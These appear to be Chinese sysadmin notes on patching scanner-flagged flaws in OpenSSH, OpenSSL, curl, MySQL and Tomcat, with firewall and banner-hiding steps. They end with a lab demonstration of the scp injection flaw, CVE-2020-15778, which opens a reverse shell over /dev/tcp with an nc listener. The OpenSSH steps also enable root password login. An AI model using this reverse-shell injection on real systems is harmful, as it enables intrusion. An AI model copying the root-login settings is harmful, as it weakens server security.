修复顺序:
openssl -> openssh
openssl-> curl
Note
精炼、完善版本参看:Linux/升级OpenSSH
升级 openssh 9.0p1 可解决的漏洞:
- OpenSSH 安全漏洞(CVE-2019-6109)
- OpenSSH 安全漏洞(CVE-2019-6110)
- OpenSSH 安全漏洞(CVE-2019-6111)
- OpenSSH 安全漏洞(CVE-2020-14145)
OpenSSH 操作系统命令注入漏洞(CVE-2020-15778)- OpenSSH 用户枚举漏洞(CVE-2018-15919)
- OpenSSH 输入验证错误漏洞(CVE-2019-16905)
- OpenSSH 安全漏洞(CVE-2016-20012)
- OpenSSH 访问限制绕过漏洞(CVE-2018-20685)
- OpenSSH 资源管理错误漏洞(CVE-2021-28041)
- OpenSSH 授权问题漏洞(CVE-2021-36368)
- OpenSSH安全漏洞(CVE-2021-41617)
修改源代码可解决的漏洞:
- SSH版本信息可被获取(CVE-1999-0634)
Tip
OpenSSH 是 BSD 类的软件,只有 Makefile,而 linux 发行版一般都用了 autoconf 生成 Makefile,所以就有了 P1。P1 就是 Patch1 的意思,给 OpenSSH 打上 autoconf 的补丁,方便构建。
所需组件
# 所需组件
yum -y install pam-devel gcc zlib zlib-devel openssl-devel libselinux-devel删除低版本OpenSSH的的rpm包
rpm -e --nodeps `rpm -qa | grep openssh` Warning
删除 openssh 前建议开启一个 sftp 终端以传输必要文件,因为删除 openssh 后将无法连接新的远程终端,也无法使用scp进行文件拷贝。
升级 openssh 需要注意:
- 确保所需组件安装成功
- 安装有问题时,需要通过 yum 安装 openssh 以恢复 ssh 连接
- 外网需确保 yum 可以正常使用
- 内网事先上传 CentOS 完整镜像到服务器作为本地源
安装openssh
(1)解压,并进入目录
# 解压目录可指定其他
tar -zxvf openssh-9.0p1.tar.gz -C /opt
cd /opt/openssh-8.9p1Note
修改 openssh 版本号可解决SSH版本信息可被获取(CVE-1999-0634):
vim version.h
#define SSH_VERSION "welcome"安装完成后,查看 ssh 端口 banner
telnet 172.16.1.7 22
SSH-2.0-welcome(2)执行配置命令
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-md5-passwords --with-pam --with-zlib --with-tcp-wrappers --with-ssl-dir=/usr/local/openssl --without-hardeningNote
--with-ssl-dir=/usr/local/openssl是指定使用的 openssl,所以还是先参看下文升级 openssl 吧,反正也有漏洞。
(3)编译、安装
make
chmod 600 /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_ecdsa_key /etc/ssh/ssh_host_ed25519_key
make installNote
需要在make install之前授权,不然会报权限太过开放Permissions 0640 for 'xxx' are too open
/usr/bin/mkdir -p /etc/ssh
ssh-keygen: generating new host keys: DSA
/usr/sbin/sshd -t -f /etc/ssh/sshd_config
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0640 for '/etc/ssh/ssh_host_rsa_key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0640 for '/etc/ssh/ssh_host_ecdsa_key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0640 for '/etc/ssh/ssh_host_ed25519_key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
sshd: no hostkeys available -- exiting.
make: [check-config] 错误 1 (忽略)(4)复制配置文件并设置允许root用户远程登录
cp -a contrib/redhat/sshd.init /etc/init.d/sshd
cp -a contrib/redhat/sshd.pam /etc/pam.d/sshd.pam
chmod u+x /etc/init.d/sshd
vim /etc/ssh/sshd_config 修改PermitRootLogin项为yes
#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10修改PasswordAuthentication 为yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no添加添加自启服务ssh到开机启动项
chkconfig --add sshd
chkconfig sshd on重启服务
systemctl restart sshd查看下安装结果
ssh -V检查可用性
OpenSSH升级版本到最新(8.9) - Sureing - 博客园 (cnblogs.com)
centos7.9 - 升级openssh9.0 - 知乎 (zhihu.com)
大佬的升级方式(没有试过):
| 漏洞名称 | |
|---|---|
| 详细描述 | OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.9p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。 参考链接:https://github.com/cpandya2909/CVE-2020-15778/ |
| 解决办法 | 厂商补丁: 目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法: https://www.openssh.com/ 临时缓解措施: 可以禁用scp,改用rsync等缓解风险(可能会导致小文件机器内拷贝变慢) |
| 威胁分值 | 7.8 |
| 危险插件 | 否 |
| 发现日期 | 2020-07-24 |
| CVE编号 | CVE-2020-15778 |
| CNNVD编号 | CNNVD-202007-1519 |
| CNCVE编号 | CNCVE-202015778 |
| CVSS评分 | 6.8 |
| CNVD编号 | CNVD-2020-42668 |
禁用 scp,使用 sftp、rsync
#查看openssh安装包
[root@localhost ~]# rpm -qa|grep openssh-*
openssh-7.4p1-21.el7.x86_64
openssh-clients-7.4p1-21.el7.x86_64
openssh-server-7.4p1-21.el7.x86_64
#卸载openssh-clients
[root@localhost ~]# yum remove openssh-clients -y
#重启sshd服务
[root@localhost ~]# systemctl restart sshd.service
# 测试
# 本机
[root@localhost ~]# scp
-bash: /usr/bin/scp: 没有那个文件或目录
# 其他服务器
[root@localhost ~]# scp [email protected]:/usr/bin/base64 ./
[email protected]'s password:
bash: scp: 未找到命令编译安装使用rpm无法找到软件包,rm吧,累了
mv /usr/bin/scp /usr/bin/scp.bak方法纯属掩耳盗铃,仅仅是本机用不了,其他服务器用依然可以对本机使用 scp 协议。
经测试,直至最新的 9.1 版本依然存在这个漏洞,参看[OpenSSH 操作系统命令注入漏洞(CVE-2020-15778)](Linux/漏洞修复.md#OpenSSH 操作系统命令注入漏洞(CVE-2020-15778)),官方的回复是不修复:
The scp command is a historical protocol (called rcp) which relies upon that style of argument passing and encounters expansion problems. It has proven very difficult to add "security" to the scp model. All attempts to "detect" and "prevent" anomalous argument transfers stand a great chance of breaking existing workflows. Yes, we recognize it the situation sucks. But we don't want to break the easy patterns people use scp for, until there is a commonplace replacement. People should use rsync or something else instead if they are concerned.
| 漏洞名称 | |
|---|---|
| 详细描述 | OpenSSH是一种开放源码的SSH协议的实现,初始版本用于OpenBSD平台,现在已经被移植到多种Unix/Linux类操作系统下。 如果配置为CBC模式的话,OpenSSH没有正确地处理分组密码算法加密的SSH会话中所出现的错误,导致可能泄露密文中任意块最多32位纯文本。在以标准配置使用OpenSSH时,攻击者恢复32位纯文本的成功概率为2^{-18},此外另一种攻击变种恢复14位纯文本的成功概率为2^{-14}。 |
| 解决办法 | 临时解决方法: * 在SSH会话中仅使用CTR模式加密算法,如AES-CTR。 厂商补丁: OpenSSH ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://downloads.ssh.com/ 对于具体Linux发行版中使用的版本,可以参考如下链接,确认系统是否受该漏洞影响: Redhat ------- https://rhn.redhat.com/errata/RHSA-2009-1287.html Suse ------- http://support.novell.com/security/cve/CVE-2008-5161.html Ubuntu ------- http://people.canonical.com/~ubuntu-security/cve/2008/CVE-2008-5161.html |
| 威胁分值 | 2.6 |
| 危险插件 | 否 |
| 发现日期 | 2008-11-19 |
| CVE编号 | CVE-2008-5161 |
| BUGTRAQ | 32319 |
| NSFOCUS | 12630 |
| CNNVD编号 | CNNVD-200811-321 |
| CNCVE编号 | CNCVE-20085161 |
| CVSS评分 | 2.6 |
| CNVD编号 | CNVD-2009-12630 |
在SSH会话中仅使用CTR模式加密算法
修改 /etc/ssh/sshd_config
vim /etc/ssh/sshd_config
# 在末尾加入
Ciphers aes128-ctr,aes192-ctr,aes256-ctr
# 重启sshd.service
systemctl restart sshd
# 查看当前的加密算法
nmap --script "ssh2*" 172.16.1.10Tip
查看支持的加密算法
[root@localhost ~]# ssh -Q cipher
3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
aes128-ctr
aes192-ctr
aes256-ctr
[email protected]
[email protected]
[email protected]man sshd_config
Ciphers
Specifies the ciphers allowed. Multiple ciphers must be comma-sep‐
arated. If the specified list begins with a ‘+’ character, then
the specified ciphers will be appended to the default set instead
of replacing them. If the specified list begins with a ‘-’ charac‐
ter, then the specified ciphers (including wildcards) will be
removed from the default set instead of replacing them. If the
specified list begins with a ‘^’ character, then the specified
ciphers will be placed at the head of the default set.
The supported ciphers are:
3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
aes128-ctr
aes192-ctr
aes256-ctr
[email protected]
[email protected]
[email protected]# 查看当前的加密算法
nmap --script "ssh2*" 172.16.1.10
| encryption_algorithms: (12)
| [email protected]
| aes128-ctr
| aes192-ctr
| aes256-ctr
| [email protected]
| [email protected]
| aes128-cbc
| aes192-cbc
| aes256-cbc
| blowfish-cbc
| cast128-cbc
| 3des-cbc| 漏洞名称 | |
|---|---|
| 详细描述 | Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。MySQL Server是其中的一个数据库服务器组件。MySQL Connectors是其中的一个连接使用MySQL的应用程序的驱动程序。 Oracle MySQL/MariaDB的 Server: Packaging (OpenSSL)产品中存在输入验证错误漏洞,该漏洞允许未经身份验证的攻击者通过多种协议进行网络访问来破坏 MySQL/MariaDB服务器。成功攻击此漏洞可导致未经授权访问关键数据或完全访问所有 MySQL/MariaDB Server 可访问数据。 |
| 解决办法 | 厂商补丁: 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://www.oracle.com/security-alerts/cpuapr2022.html |
| 威胁分值 | 7.5 |
| 危险插件 | 否 |
| 发现日期 | 2022-03-09 |
| CVE编号 | CVE-2022-0778 |
| CNNVD编号 | CNNVD-202203-1394 |
| CNCVE编号 | CNCVE-20220778 |
| CVSS评分 | 5.0 |
CVE ID CVE-2022-0778 时 间 2022-03-15 类 型 Dos 等 级 高危 远程利用 影响范围 攻击复杂度 用户交互 PoC/EXP 在野利用 3月15日,OpenSSL官方发布安全公告,修复了OpenSSL 版本 1.0.2、1.1.1 和 3.0中的拒绝服务漏洞(CVE-2022-0778)。
由于证书解析时使用的 BN_mod_sqrt() 函数存在一个错误,它会导致在非质数的情况下永远循环。可通过生成包含无效的显式曲线参数的证书来触发无限循环。由于证书解析是在验证证书签名之前进行的,因此任何解析外部提供的证书的程序都可能受到拒绝服务攻击。此外,当解析特制的私钥时(包含显式椭圆曲线参数),也可以触发无限循环。
因此易受攻击的情况如下:
l 使用服务器证书的 TLS 客户端
l 使用客户端证书的 TLS 服务器
l 托管服务提供商从客户处获取证书或私钥
l 证书颁发机构解析来自订阅者的认证请求
l 任何其他解析ASN.1椭圆曲线参数的程序
此外,任何使用BN_mod_sqrt()的其他应用程序,如果可以控制参数值,也会受到此漏洞影响。需要注意的是,任何需要证书中公钥的操作都会触发无限循环,特别是自签名的证书,在验证证书签名时会触发循环。
影响范围
OpenSSL版本1.0.2:1.0.2-1.0.2zc
OpenSSL版本1.1.1:1.1.1-1.1.1m
OpenSSL版本 3.0:3.0.0、3.0.1
目前此漏洞已经修复,建议受影响用户及时升级更新:
OpenSSL 1.0.2 用户应升级至 1.0.2zd(仅限高级支持客户)
OpenSSL 1.1.1 用户应升级至 1.1.1n
OpenSSL 3.0 用户应升级至 3.0.2
下载链接:
https://www.openssl.org/source/
注:OpenSSL 1.0.2 和OpenSSL 1.1.0 已停止支持。
https://www.openssl.org/news/secadv/20220315.txt
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778
https://securityaffairs.co/wordpress/129104/security/openssl-dos-vulnerability.html?
升级 openssl
下载最新版的 openssl: /source/index.html (openssl.org)
cd openssl-1.1.1q
./config --prefix=/usr/local/openssl
make && make install
mv /usr/bin/openssl /usr/bin/openssl.bak
ln -s /usr/local/openssl/bin/openssl /usr/bin/openssl
ln -s /usr/local/openssl/lib/libssl.so.1.1 /usr/lib64/libssl.so.1.1
ln -s /usr/local/openssl/lib/libcrypto.so.1.1 /usr/lib64/libcrypto.so.1.1
# 查看版本
openssl versionTip
如果是从1.1版本升级,还需要备份原来的库文件
mv /usr/include/openssl /usr/include/openssl.bak
mv /usr/lib64/libssl.so.1.1 /usr/lib64/libssl.so.1.1.bak
mv /usr/lib64/libcrypto.so.1.1 /usr/lib64/libcrypto.so.1.1.bak
ln -s /usr/local/openssl/include/openssl /usr/include/openssl查看版本时,如果Header版本与Library版本不一致时,会分别显示:
[root@dld6or7zfl4go2 ~]# openssl version
OpenSSL 1.1.1u 30 May 2023 (Library OpenSSL 1.1.1u 30 May 2023)有时候ln链接so文件时,仍然会链接到之前的库,很奇怪,需要重新链接:
rm -f /usr/lib64/libssl.so.1.1
rm -f /usr/lib64/libcrypto.so.1.1
ln -s /usr/local/openssl/lib/libssl.so.1.1 /usr/lib64/libssl.so.1.1
ln -s /usr/local/openssl/lib/libcrypto.so.1.1 /usr/lib64/libcrypto.so.1.1直接覆盖库文件
cp /usr/local/openssl/lib/libssl.so* /usr/lib64
cp /usr/local/curl/lib/libcurl.so* /usr/lib64升级 MySQL 5.7.39 可解决的漏洞:
- Oracle MySQL Server 信息泄露漏洞(CVE-2021-22946)
- Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21245)
- Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21270)
- Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21303)
- Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21304)
- Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21344)
- Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21367)
- Oracle MySQL 输入验证错误漏洞(CVE-2022-21417)
- Oracle MySQL 输入验证错误漏洞(CVE-2022-21427)
- Oracle MySQL 输入验证错误漏洞(CVE-2022-21444)
- Oracle MySQL 输入验证错误漏洞(CVE-2022-21451)
- Oracle MySQL 输入验证错误漏洞(CVE-2022-21454)
- Oracle MySQL 输入验证错误漏洞(CVE-2022-21460)
Oracle 2022-04 重要更新公告:Oracle Critical Patch Update Advisory - April 2022
EUVDB-ID: #VU56613
Risk: Medium
CVSSv3.1: [6.2 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-22946
CWE-ID: CWE-319 - Cleartext Transmission of Sensitive Information
Exploit availability: No
Description
The vulnerability allows a remote attacker to gain access to sensitive information.
The vulnerability exists due to an error, related to incorrect enforcement of the option on the command line or setting set to or with libcurl. A remote attacker with control over the IMAP, POP3 or FTP server can send a specially crafted but perfectly legitimate response to the libcurl client and force it silently to continue its operations without TLS encryption and transmit data in clear text over the network.
--ssl-reqd``CURLOPT_USE_SSL``CURLUSESSL_CONTROL``CURLUSESSL_ALLMitigation
Install update from vendor's website.
Vulnerable software versions
MySQL Server: 5.7.0 - 5.7.36, 8.0.0 - 8.0.27
Multiple vulnerabilities in MySQL Server (cybersecurity-help.cz)
EUVDB-ID: #VU59792
Risk: Low
CVSSv3.1: [3.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2022-21245
CWE-ID: CWE-20 - Improper Input Validation
Exploit availability: No
Description
The vulnerability allows a remote authenticated user to manipulate data.
The vulnerability exists due to improper input validation within the Server: Security: Privileges component in MySQL Server. A remote authenticated user can exploit this vulnerability to manipulate data.
Mitigation
Install update from vendor's website.
Vulnerable software versions
MySQL Server: 5.7.0 - 5.7.36, 8.0.0 - 8.0.27
Multiple vulnerabilities in MySQL Server (cybersecurity-help.cz)
EUVDB-ID: #VU59777
Risk: Medium
CVSSv3.1: [4.3 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2022-21270
CWE-ID: CWE-20 - Improper Input Validation
Exploit availability: No
Description
The vulnerability allows a remote privileged user to perform a denial of service (DoS) attack.
The vulnerability exists due to improper input validation within the Server: Federated component in MySQL Server. A remote privileged user can exploit this vulnerability to perform a denial of service (DoS) attack.
Mitigation
Install update from vendor's website.
Vulnerable software versions
MySQL Server: 5.7.0 - 5.7.36, 8.0.0 - 8.0.27
Multiple vulnerabilities in MySQL Server (cybersecurity-help.cz)
EUVDB-ID: #VU59790
Risk: Medium
CVSSv3.1: [4.3 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2022-21303
CWE-ID: CWE-20 - Improper Input Validation
Exploit availability: No
Description
The vulnerability allows a remote privileged user to perform a denial of service (DoS) attack.
The vulnerability exists due to improper input validation within the Server: Stored Procedure component in MySQL Server. A remote privileged user can exploit this vulnerability to perform a denial of service (DoS) attack.
Mitigation
Install update from vendor's website.
Vulnerable software versions
MySQL Server: 5.7.0 - 5.7.36, 8.0.0 - 8.0.27
Multiple vulnerabilities in MySQL Server (cybersecurity-help.cz)
EUVDB-ID: #VU59788
Risk: Medium
CVSSv3.1: [4.3 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2022-21304
CWE-ID: CWE-20 - Improper Input Validation
Exploit availability: No
Description
The vulnerability allows a remote privileged user to perform a denial of service (DoS) attack.
The vulnerability exists due to improper input validation within the Server: Parser component in MySQL Server. A remote privileged user can exploit this vulnerability to perform a denial of service (DoS) attack.
Mitigation
Install update from vendor's website.
Vulnerable software versions
MySQL Server: 5.7.0 - 5.7.36, 8.0.0 - 8.0.27
Multiple vulnerabilities in MySQL Server (cybersecurity-help.cz)
EUVDB-ID: #VU59789
Risk: Medium
CVSSv3.1: [4.3 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2022-21344
CWE-ID: CWE-20 - Improper Input Validation
Exploit availability: No
Description
The vulnerability allows a remote privileged user to perform a denial of service (DoS) attack.
The vulnerability exists due to improper input validation within the Server: Replication component in MySQL Server. A remote privileged user can exploit this vulnerability to perform a denial of service (DoS) attack.
Mitigation
Install update from vendor's website.
Vulnerable software versions
MySQL Server: 5.7.0 - 5.7.36, 8.0.0 - 8.0.27
Multiple vulnerabilities in MySQL Server (cybersecurity-help.cz)
EUVDB-ID: #VU59771
Risk: Medium
CVSSv3.1: [4.8 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2022-21367
CWE-ID: CWE-20 - Improper Input Validation
Exploit availability: No
Description
The vulnerability allows a remote privileged user to damange or delete data.
The vulnerability exists due to improper input validation within the Server: Compiling component in MySQL Server. A remote privileged user can exploit this vulnerability to damange or delete data.
Mitigation
Install update from vendor's website.
Vulnerable software versions
MySQL Server: 5.7.0 - 5.7.36, 8.0.0 - 8.0.27
Multiple vulnerabilities in MySQL Server (cybersecurity-help.cz)
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Compiling). Supported versions that are affected are 5.7.36 and prior and 8.0.27 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data.
External References:
https://www.oracle.com/security-alerts/cpujan2022.html#AppendixMSQL
| 漏洞名称 | |
|---|---|
| 详细描述 | Oracle MySQL Server是美国甲骨文(Oracle)公司的一款关系型数据库。 MySQL Server存在存在信息泄露漏洞,该漏洞的存在是由于 MySQL Server 中的 Server: Compiling (cURL) 组件组件存在信息泄露漏洞。攻击者可利用该漏洞未授权读取数据,影响数据的保密性。 |
| 解决办法 | 厂商补丁: Oracle ---- 目前厂商已经发布了升级补丁以修复这个安全问题,补丁获取链接: https://www.oracle.com/security-alerts/cpujan2022.html |
| 威胁分值 | 7.5 |
| 危险插件 | 否 |
| 发现日期 | 2021-10-25 |
| CVE编号 | CVE-2021-22946 |
| NSFOCUS | 60265 |
| CNNVD编号 | CNNVD-202109-997 |
| CNCVE编号 | CNCVE-202122946 |
| CVSS评分 | 5.0 |
A user can tell curl to require a successful upgrade to TLS when speaking to an IMAP, POP3 or FTP server ( on the command line or set to or with libcurl). This requirement could be bypassed if the server would return a properly crafted but perfectly legitimate response.
--ssl-reqd``CURLOPT_USE_SSL``CURLUSESSL_CONTROL``CURLUSESSL_ALLThis flaw would then make curl silently continue its operations without TLS contrary to the instructions and expectations, exposing possibly sensitive data in clear text over the network.
- Affected versions: curl 7.20.0 to and including 7.78.0
- Not affected versions: curl < 7.20.0 and curl >= 7.79.0
curl - Protocol downgrade required TLS bypassed - CVE-2021-22946
有一说要升级 mysql,因为 mysql 中用到的组件 curl 存在漏洞,但系统中的 curl 咋个说,,不管了,两个都升级吧:dog:,升级 mysql 参看Linux/安装mysql - 升级 mysql
下载最新版的 curl curl - Download
tar -zxvf curl-xxx.tar.gz -C /opt
# 备份原curl
mv /usr/bin/curl /usr/bin/curl.bak
# 编译安装
cd /opt/curl-xxx
./configure --prefix=/usr/local/curl --with-ssl
make
make install
# 添加到环境变量
vim /etc/profile
# 在最后添加
export PATH=$PATH:/usr/local/curl/bin
# 使配置生效
source /etc/profile
# 查看版本
curl --version| 漏洞名称 | |
|---|---|
| 详细描述 | 远程主机会回复ICMP_TIMESTAMP查询并返回它们系统的当前时间。 这可能允许攻击者攻击一些基于时间认证的协议。 |
| 解决办法 | NSFOCUS建议您采取以下措施以降低威胁: * 在您的防火墙上过滤外来的ICMP timestamp(类型 13)报文以及外出的ICMP timestamp回复报文。 |
| 威胁分值 | 2.1 |
| 危险插件 | 否 |
| 发现日期 | 1997-08-01 |
| CVE编号 | CVE-1999-0524 |
| CNNVD编号 | CNNVD-199708-003 |
| CNCVE编号 | CNCVE-19990524 |
| CVSS评分 | 0 |
firewall-cmd --permanent --direct --add-rule ipv4 filter INPUT 0 -p ICMP --icmp-type timestamp-request -m comment --comment "deny ICMP timestamp" -j DROP
firewall-cmd --permanent --direct --add-rule ipv4 filter INPUT 0 -p ICMP --icmp-type timestamp-reply -m comment --comment "deny ICMP timestamp" -j DROP| 漏洞名称 | |
|---|---|
| 详细描述 | 本插件使用Traceroute探测来获取扫描器与远程主机之间的路由信息。攻击者也可以利用这些信息来了解目标网络的网络拓扑。 |
| 解决办法 | 在防火墙出站规则中禁用echo-reply(type 0)、time-exceeded(type 11)、destination-unreachable(type 3)类型的ICMP包。 |
| 威胁分值 | 1.0 |
| 危险插件 | 否 |
| 发现日期 | 1999-01-01 |
firewall-cmd --permanent --direct --add-rule ipv4 filter INPUT 0 -p ICMP --icmp-type 11 -m comment --comment "deny traceroute" -j DROP修改完记得reload下
firewall-cmd --reload查看添加的规则
firewall-cmd --direct --get-all-rulesTip
ICMP 协议如果没用到,直接禁用了,毕竟阿里云等云防火墙一般也都默认禁用 ICMP 协议的
vim /etc/sysctl.conf
# 禁用ICMP,1:禁用,0:启用
net.ipv4.icmp_echo_ignore_all = 1
# 使配置生效
sysctl -p
# ping测试
ping 172.16.1.7RedHat 7.0及CentOS 7.0禁止Ping的三种方法 - 导航狗-博客园 - 博客园 (cnblogs.com)
升级 tomcat-9.0.65 可解决的漏洞:
- Apache Tomcat 权限许可和访问控制问题漏洞(CVE-2022-23181)
- Apache Tomcat 代码问题漏洞(CVE-2022-29885)
- Apache Tomcat 跨站脚本漏洞(CVE-2022-34305)
Low: Apache Tomcat XSS in examples web application CVE-2022-34305
The Form authentication example in the examples web application displayed user provided data without filtering, exposing a XSS vulnerability.
This was fixed with commit 8b60af90.
This issue was reported to the Apache Tomcat Security team on 22 June 2022. The issue was made public on 23 June 2022.
Affects: 9.0.30 to 9.0.64
Low: Apache Tomcat EncryptInterceptor DoS CVE-2022-29885
The documentation for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks.
This was fixed with commit eaafd282.
This issue was reported to the Apache Tomcat Security team by 4ra1n on 17 April 2022. The issue was made public on 10 May 2022.
Affects: 9.0.13 to 9.0.62
Note: The issue below was fixed in Apache Tomcat 9.0.57 but the release vote for the 9.0.57 release candidate did not pass. Therefore, although users must download 9.0.58 to obtain a version that includes a fix for these issues, version 9.0.57 is not included in the list of affected versions.
Low: Local Privilege Escalation CVE-2022-23181
The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore.
This was fixed with commit 1385c624.
This issue was reported to the Apache Tomcat Security team by Trung Pham of Viettel Cyber Security on 10 December 2021. The issue was made public on 26 January 2022.
Affects: 9.0.35 to 9.0.56
升级 tomcat
# server目录替换
[root@localhost local]# mv server server_old
[root@localhost local]# tar -zxvf apache-tomcat-9.0.65.tar.gz
[root@localhost local]# mv apache-tomcat-9.0.65 server
# 删除tomcat自带项目
[root@localhost local]# rm -rf server/webapps/*
# 移动项目到新的tomcat目录
[root@localhost local]# mv server_old/webapps/ROOT/ server/webapps/
# 拷贝自定义脚本
[root@localhost local]# cp -rp server_old/bin/restart.sh server/bin
[root@localhost local]# cp -rp server_old/bin/stop.sh server/bin
# 启动
[root@localhost local]# cd server
[root@localhost server]# ./bin/restart.sh可能需要同步修改的文件:
- /bin/catalina.sh(tomcat 进程 pid)
- /bin/setclasspath.sh(对该项目配置的jdk)
- /conf/context.xml(cacheMaxSize等配置)
- /conf/server.xml(连接器、端口配置,自动部署配置)
| 漏洞名称 | |
|---|---|
| 详细描述 | 本插件检测远端HTTP Server信息。这可能使得攻击者了解远程系统类型以便进行下一步的攻击。 |
| 解决办法 | NSFOCUS建议您采取以下措施以降低威胁: 改变您的HTTP服务器的缺省banner |
| 威胁分值 | 0.0 |
| 危险插件 | 否 |
| 发现日期 | 1999-01-01 |
| CVE编号 | CVE-1999-0633 |
| CNCVE编号 | CNCVE-19990633 |
缺省服务器 banner/隐藏服务器版本号,以防止针对性攻击。
方法1:
修改 /lib/catalina.jar/org.apache.catalina.util/ServerInfo.properties
# server.info=Apache Tomcat/9.0.54
# server.number=9.0.54.0
# server.built=Sep 28 2021 13:51:49 UTC
server.info=Server
server.number=0.0.0.0
server.built=Sep 28 2021 13:51:49 UTC方法2:
修改 tomcat 连接器的server属性,/conf/server.xml:
<Connector port="8080" protocol="HTTP/1.1"
connectionTimeout="20000"
redirectPort="8443"
server="Server"/># 查看服务器banner
[root@localhost bin]# curl -I 172.16.100.72:7100
HTTP/1.1 302
Set-Cookie: JSESSIONID=-; Path=/; HttpOnly
Location: /
Transfer-Encoding: chunked
Date: Wed, 24 Aug 2022 06:52:27 GMT
Server: Server
以上两种方法是否只需要修改其中一个待验证。
默认Tomcat 是开启了对war包的热部署。为了防止被植入***等恶意程序,因此我们要关闭自动部署。
修改 /conf/server.xml Engine标签中的Host标签
<Host name="localhost" appBase="webapps"
unpackWARs="false" autoDeploy="false">渗透机:192.168.3.231
靶机:192.168.3.200
# 渗透机创建sh文件,写入反弹shell命令
vim 1.sh
bash -i >& /dev/tcp/192.168.3.231/4444 0>&1
# 渗透机上传sh文件到靶机
scp 1.sh [email protected]:/tmp/1.sh
# 在渗透机新开终端监听4444端口
nc -lvvp 4444
# 若需安装nc
yum -y install nc
# 渗透机远程执行命令
scp 1.sh [email protected]:/'`sh /tmp/1.sh`'
# 此时可以在靶机的新开终端看到反弹的shell,输入命令测试
ip addr